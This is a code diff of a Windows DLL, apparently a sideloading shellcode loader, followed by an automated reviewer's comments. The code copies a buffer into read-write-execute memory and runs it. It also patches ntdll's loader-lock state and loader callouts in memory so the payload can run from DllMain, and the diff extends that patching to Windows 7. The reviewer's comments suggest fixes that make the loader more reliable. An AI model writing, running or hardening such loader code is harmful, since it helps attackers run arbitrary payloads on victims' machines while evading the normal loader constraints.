1 | 1 | | #include <Windows.h> |
| 2 | + | #include <stdio.h> |
2 | 3 | | |
3 | 4 | | #include "export.hpp" |
4 | 5 | | |
| skipped 7 lines |
12 | 13 | | LPVOID shellcode = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, 0x40); |
13 | 14 | | |
14 | 15 | | memcpy(shellcode, buf, sizeof(buf)); |
15 | | - | |
| 16 | + | printf("%x \n", shellcode); |
16 | 17 | | void(*func)(); |
17 | 18 | | func = (void(*)())shellcode; |
18 | 19 | | func(); |
| skipped 180 lines |
199 | 200 | | return 0; |
200 | 201 | | } |
201 | 202 | | |
| 203 | + | BYTE* readSectionData(BYTE* buffer, PDWORD rdataLength, char* secName) { |
| 204 | + | PIMAGE_DOS_HEADER dosHeader = reinterpret_cast<PIMAGE_DOS_HEADER>(buffer); |
| 205 | + | if (dosHeader->e_magic != IMAGE_DOS_SIGNATURE) { |
| 206 | + | return 0; |
| 207 | + | } |
| 208 | + | |
| 209 | + | PIMAGE_NT_HEADERS ntHeaders = reinterpret_cast<PIMAGE_NT_HEADERS>(reinterpret_cast<BYTE*>(buffer) + dosHeader->e_lfanew); |
| 210 | + | if (ntHeaders->Signature != IMAGE_NT_SIGNATURE) { |
| 211 | + | return 0; |
| 212 | + | } |
| 213 | + | |
| 214 | + | PIMAGE_SECTION_HEADER sectionHeader = IMAGE_FIRST_SECTION(ntHeaders); |
| 215 | + | for (int i = 0; i < ntHeaders->FileHeader.NumberOfSections; ++i) { |
| 216 | + | if (strcmp(secName, (char*)sectionHeader[i].Name) == 0) { |
| 217 | + | *rdataLength = sectionHeader[i].Misc.VirtualSize; |
| 218 | + | return reinterpret_cast<BYTE*>(buffer) + sectionHeader[i].VirtualAddress; |
| 219 | + | } |
| 220 | + | } |
| 221 | + | |
| 222 | + | return 0; |
| 223 | + | } |
| 224 | + | |
202 | 225 | | size_t GetSkipFileAPIBrokering(VOID) |
203 | 226 | | { |
204 | 227 | | #if defined(_WIN64) |
| skipped 4 lines |
209 | 232 | | } |
210 | 233 | | |
211 | 234 | | #ifdef _WIN64 |
212 | | - | unsigned char lock_count_flag[] = { 0x66, 0x21, 0x88, 0xEE, 0x17, 0x00, 0x00 }; |
| 235 | + | unsigned char lock_count_flag[] = {0x66, 0x21, 0x88, 0xEE, 0x17, 0x00, 0x00}; |
| 236 | + | unsigned char win7_lock_count_flag[] = {0xF0, 0x44, 0x0F, 0xB1, 0x35}; |
213 | 237 | | #else |
214 | 238 | | unsigned char lock_count_flag[] = {0x66, 0x21, 0x88, 0xCA, 0x0F, 0x00, 0x00, 0xE8}; |
| 239 | + | unsigned char win7_lock_count_flag[] = {0xC7, 0x45, 0xFC, 0xFE, 0xFF, 0xFF, 0xFF, 0xBB}; |
215 | 240 | | #endif |
216 | 241 | | |
217 | 242 | | VOID UNLOOK() |
218 | 243 | | { |
219 | 244 | | HMODULE base = GetModuleHandleA("ntdll.dll"); |
220 | | - | PIMAGE_DOS_HEADER pDH = (PIMAGE_DOS_HEADER)base; |
221 | | - | DWORD size_of_img; |
222 | | - | |
223 | | - | if (*(PWORD)((size_t)pDH + pDH->e_lfanew + 0x18) == IMAGE_NT_OPTIONAL_HDR32_MAGIC){ |
224 | | - | PIMAGE_NT_HEADERS32 pNtH32 = PIMAGE_NT_HEADERS32((size_t)pDH + pDH->e_lfanew); |
225 | | - | PIMAGE_OPTIONAL_HEADER32 pOH32 = &pNtH32->OptionalHeader; |
226 | | - | |
227 | | - | size_of_img = pOH32->SizeOfImage; |
228 | | - | } |
229 | | - | else { |
230 | | - | PIMAGE_NT_HEADERS64 pNtH64 = PIMAGE_NT_HEADERS64((size_t)pDH + pDH->e_lfanew); |
231 | | - | PIMAGE_OPTIONAL_HEADER64 pOH64 = &pNtH64->OptionalHeader; |
232 | | - | |
233 | | - | size_of_img = pOH64->SizeOfImage; |
234 | | - | } |
| 245 | + | DWORD rdataLength; |
| 246 | + | BYTE* textData = readSectionData((BYTE*)base, &rdataLength, ".text"); |
235 | 247 | | |
236 | 248 | | //适用于win7以上的系统,需要格外修改值 |
237 | | - | size_t addr = memFind((BYTE*)base, lock_count_flag, (size_t)base + size_of_img, sizeof(lock_count_flag)); |
238 | | - | Sleep(1); |
| 249 | + | size_t addr = memFind(textData, lock_count_flag, (size_t)textData + rdataLength, sizeof(lock_count_flag)); |
| 250 | + | |
239 | 251 | | if (addr != 0) |
240 | 252 | | { |
241 | 253 | | #ifdef _WIN64 |
242 | 254 | | addr = (size_t)addr + 0x15; |
243 | 255 | | addr = addr + 5 + *(PDWORD)addr; |
244 | | - | *(PDWORD)addr = (*(PDWORD)addr) & 0; |
245 | 256 | | #else |
246 | 257 | | addr = (size_t)addr + 0xe; |
247 | 258 | | addr = *(PDWORD)addr; |
248 | | - | *(PDWORD)addr = (*(PDWORD)addr) & 0; |
249 | 259 | | #endif |
| 260 | + | * (PDWORD)addr = (*(PDWORD)addr) & 0; |
250 | 261 | | |
251 | 262 | | size_t skipFileAPIBrokeringAddr = GetSkipFileAPIBrokering(); |
252 | 263 | | (*(PWORD)skipFileAPIBrokeringAddr) = (*(PWORD)skipFileAPIBrokeringAddr) & 0xEFFF; |
| skipped 11 lines |
264 | 275 | | RtlLeaveCriticalSection = (RTLLEAVECRITICALSECTION)GetProcAddress((HMODULE)hModule, "RtlLeaveCriticalSection"); |
265 | 276 | | |
266 | 277 | | RtlLeaveCriticalSection((PRTL_CRITICAL_SECTION)Peb->LoaderLock); |
| 278 | + | |
| 279 | + | //win7 和 08以下系统没有LdrFastFailInLoaderCallout导出函数 |
| 280 | + | size_t hookAddr = (size_t)GetProcAddress((HMODULE)hModule, "LdrFastFailInLoaderCallout"); |
| 281 | + | |
| 282 | + | if (hookAddr > 0) { |
| 283 | + | #ifdef _WIN64 |
| 284 | + | hookAddr = hookAddr + 0x18 + 5 + *(PDWORD)(hookAddr + 0x18); |
| 285 | + | #else |
| 286 | + | hookAddr = *(PDWORD)(hookAddr + 0x13); |
| 287 | + | #endif |
| 288 | + | *(PDWORD)hookAddr = 2; |
| 289 | + | } |
| 290 | + | |
| 291 | + | addr = memFind(textData, win7_lock_count_flag, (size_t)textData + rdataLength, sizeof(win7_lock_count_flag)); |
| 292 | + | Sleep(1); |
| 293 | + | if (addr != 0) |
| 294 | + | { |
| 295 | + | #ifdef _WIN64 |
| 296 | + | hookAddr = addr + 0x5 + 4 + *(PDWORD)(addr + 0x5); |
| 297 | + | #else |
| 298 | + | hookAddr = *(PDWORD)((size_t)addr + 0x8); |
| 299 | + | #endif |
| 300 | + | *(PDWORD)hookAddr = 2; |
| 301 | + | } |
267 | 302 | | } |
268 | 303 | | |
269 | 304 | | BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) |
| skipped 11 lines |
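Review bot: The `strcmp(secName, (char*)sectionHeader[i].Name)` comparison inside readSectionData's section loop can read past the header, because `IMAGE_SECTION_HEADER::Name` is an eight-byte field that carries no NUL terminator when all eight characters are used; the bounded form `if (strncmp(secName, (const char*)sectionHeader[i].Name, IMAGE_SIZEOF_SHORT_NAME) == 0) {` stays inside the field, and taking `secName` as `const char*` lets UNLOOK pass the `".text"` literal without the deprecated string-literal-to-`char*` conversion. readSectionData also returns 0 on a bad DOS/NT signature or a missing section, but UNLOOK uses `textData` immediately after the call without checking it, and `rdataLength` stays uninitialized on that path; a guard such as `if (textData == NULL) { return; }` right after the call would avoid handing a null base and an indeterminate length to memFind (memFind's definition is outside this view, so its handling of those arguments is inferred). Separately, `printf("%x \n", shellcode);` passes an `LPVOID` to a `%x` conversion, which is undefined behaviour and prints only the low 32 bits on x64; `printf("%p\n", shellcode);` is the matching specifier.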